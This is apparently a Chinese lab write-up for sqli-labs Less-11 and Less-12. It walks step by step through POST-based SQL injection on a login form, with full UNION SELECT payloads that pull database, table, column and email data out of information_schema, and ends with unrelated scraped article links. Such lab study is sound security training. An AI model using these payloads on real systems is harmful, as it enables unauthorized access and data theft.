Less-11(报错注入POST方式)

1.判断是否存在注入点

因为是POST 方式的与GET方式稍有不同,可以选择使用burp suite以及火狐的hackbar进行操作,直接在输入框username处输入admin密码随意,得到一个正确的回显

Username处输入admin’密码随意,出现报错

提示在123456处因为 ’ 出现错误,所以尝试在username处输入admin’ #(将密码及后面部分全部注释掉,即为:uname=admin' #&passwd=123456&submit=Submit)(这里不能用--+)

回显正确,判断存在注入点,注入方式为:’’

2.判断回显位数

uname=admin' order by 2#&passwd=1&submit=Submit  经过判断得到回显位数为2

3.爆数据库

uname=-admin' union select 1,database()#&passwd=1&submit=Submit

因为使用union,那么前面部分必须要不存在才行,得到数据库名字为security

4.爆表名

uname=-admin' union select 1,group_concat(table_name) from information_schema.tables where table_schema='security' #&passwd=1&submit=Submit,如下图,得到数据库下的所有表名

5.爆字段

uname=-admin' union select group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=1&submit=Submit,发现出现了如下报错的提示:

使用的SELECT语句具有不同数量的列

经过检查发现:回显位是2,但是使用select语句时并没有用两个

修改为:uname=-admin' union select 1,group_concat(column_name) from information_schema.columns where table_name='emails' #&passwd=&submit=Submit

如下图,得到表emails下的所有字段

6.爆数据

uname=-admin' union select 1,group_concat(id) from emails #&passwd=&submit=Submit

如图,得到字段id下的所有数据

-------------------------------------------------------END----------------------------------------------------------------

Less-12(报错注入)

1.判断是否存在注入点

当执行admin 以及admin'时都未出现报错,而执行如下时,出现报错信息

uname=admin"&passwd=admin&submit=Submit

通过分析,当执行uname=admin")#&passwd=&submit=Submit时,回显正常,判断存在注入点,注入方式为:(“”)

2.判断回显位数

uname=admin") order by 2#&passwd=&submit=Submit,经过尝试得到回显位数为2

3.爆数据库

uname=-admin") union select 1,database()#&passwd=&submit=Submit,得到数据库名

4.爆表名

uname=uname=-admin") union select 1, group_concat(table_name) from information_schema.tables where table_schema='security'#&passwd=&submit=Submit

5.爆字段

uname=-admin") union select 1,group_concat(column_name) from information_schema.columns where table_name='uagent'#&passwd=&submit=Submit,表uagent中的数据为空,如下

6.爆数据

因为uagent里的数据都为空,所以还是选择爆emails,比较好观察

uname=-admin") union select 1,group_concat(email_id) from emails#&passwd=&submit=Submit

-------------------------------------------------------END----------------------------------------------------------------

sqli-labs less-11 --> less-12的更多相关文章

  1. [团队项目]第二个冲刺 看板和燃尽图 Sprint2 6.8/6.9/6.10/6.11/6.12/6.13/6.14

    1.开始一个新的冲刺: 起止:2016.6.1~2016.6.14 按照以下过程进行 ProductBacklog:继续向下细化 Sprint 计划会议:确定此次冲刺要完成的目标 Sprint Bac ...

  2. 2016年11月12日 星期六 --出埃及记 Exodus 20:3

    2016年11月12日 星期六 --出埃及记 Exodus 20:3 "You shall have no other gods before me.除了我以外,你不可有别的 神.

  3. SQLI LABS Basic Part(1-22) WriteUp

    好久没有专门练SQL注入了,正好刷一遍SQLI LABS,复习巩固一波~ 环境: phpStudy(之前一直用自己搭的AMP,下了这个之后才发现这个更方便,可以切换不同版本的PHP,没装的小伙伴赶紧试 ...

  4. Atitit jquery  1.4--v1.11  v1.12  v2.0  3.0 的新特性

    Atitit jquery  1.4--v1.11  v1.12  v2.0  3.0 的新特性 1.1. Jquery1.12  jQuery 2.2 和 1.12 新版本发布 - OPEN资讯.h ...

  5. 阅读<构建之法>第三10、11、12章并提出问题

    <构建之法>第10.11.12章 第10章: 问题:对我们了解了用户的需求后,但是我们想法和做出来的软件会和用户的需求有偏差,比如风格.界面的修饰等等,那么我们程序猿怎样才能让自己的想法更 ...

  6. MAC 下编译 ANDROID P 源码 提示 internal error: Could not find a supported mac sdk: ["10.10" "10.11" "10.12" "10.13"]

    MAC 下编译 ANDROID P 源码出现下面的问题: ninja: no work to do. [21/21] out/soong/.bootstrap/bin/soong_build out/ ...

  7. JDBC中 mysql数据库的连接工具类 Java登录 及增删改查 整理 附带:Navicat Premium 11.0.12中文破解版.zip(下载)mysql数据库工具

    先写一个工具类,有实现MySQL数据库连接的方法,和关闭数据库连接.关闭ResultSet  结果集.关闭PreparedStatement 的方法.代码如下: package com.swift; ...

  8. 总结近期CNN模型的发展(一)---- ResNet [1, 2] Wide ResNet [3] ResNeXt [4] DenseNet [5] DPNet [9] NASNet [10] SENet [11] Capsules [12]

    总结近期CNN模型的发展(一) from:https://zhuanlan.zhihu.com/p/30746099 余俊 计算机视觉及深度学习   1.前言 好久没有更新专栏了,最近因为项目的原因接 ...

  9. Sqli labs系列-less-3 。。。

    原本想着找个搜索型的注入玩玩,毕竟昨天被实力嘲讽了 = = . 找了好长时间,我才发现,我没有 = = ,网上搜了一个存在搜索型注入的源码,我看了好长时间,楞没看出来从哪里搜索注入了....估计是我太 ...

  10. Sqli labs系列-less-2 详细篇

    就今天晚上一个小插曲,瞬间感觉我被嘲讽了. SQL手工注入这个东西,杂说了吧,如果你好久不玩的话,一时说开了,你也只能讲个大概,有时候,长期不写写,你的构造语句还非常容易忘,要不我杂会被瞬间嘲讽了啊. ...

随机推荐

  1. OFDM Modulation Scheme

  2. 踩坑ThinkPHP5之模型对象返回的数据集如何转为数组

    各位小伙伴们大家好,冷月今天在做项目的过程中呢,遇到了一个坑就是用tp5的模型操作数据库时,返回的是数据集而不是直接的数组.于是冷月就想办法如何将数据集转为数组.写下这篇博文,防止大家遇到这个坑时可以 ...

  3. EF--封装三层架构IOC

    为什么分层? 不分层封装的话,下面的代码就是上端直接依赖于下端,也就是UI层直接依赖于数据访问层,分层一定要依赖抽象,满足依赖倒置原则,所以我们要封装,要分层 下面这张图和传统的三层略有不同,不同之处 ...

  4. scrapy框架中多个spider,tiems,pipelines的使用及运行方法

    用scrapy只创建一个项目,创建多个spider,每个spider指定items,pipelines.启动爬虫时只写一个启动脚本就可以全部同时启动. 本文代码已上传至github,链接在文未. 一, ...

  5. [MySQL]ANALYZE TABLE 更新索引基数

    MySQL使用存储的键分布基数来确定表连接顺序在决定对查询中的特定表使用哪些索引时,也会使用使用键分布基数 ANALYZE TABLE 表名 可以更新表的索引基数,使其更接近非重复的记录数,记录数可以 ...

  6. Qt编写的项目作品3-输入法V2018

    一.功能特点 未采用Qt系统层输入法框架,独创输入切换机制. 纯QWidget编写,支持任何目标平台(亲测windows.linux.嵌入式linux等),支持任意Qt版本(亲测Qt4.6.0到Qt5 ...

  7. Kong 系列【六】添加插件---ip-restriction之黑白名单

    写在前边 本地postMan请求http://192.168.130.131:8000/test-route,可以正常访问,本地IP:192.168.130.1同样在虚拟机环境192.168.130. ...

  8. Charles老版本教程

    链接:http://pan.baidu.com/s/1c16PxEo  刮开有奖->密码:dbml 初级篇: 1.1设置代理 1.2参数设置+界面介绍 1.3屏蔽多余数据 1.4请求重发 1.5 ...

  9. TNS-01189 During Listener Monitoring Using Enterprise Manager

    oracle 12.2 RAC监听日志报错:15-JAN-2020 22:27:53 * (CONNECT_DATA=(COMMAND=VERSION)) * version * 1189TNS-01 ...

  10. adams技巧汇总

    T+左键        平动模型 R+左键        旋转模型 Z+左键        动态缩放 F或Ctrl+F     以最大比例全面显示模型 S+左键        沿着垂直于屏幕的轴线旋转 ...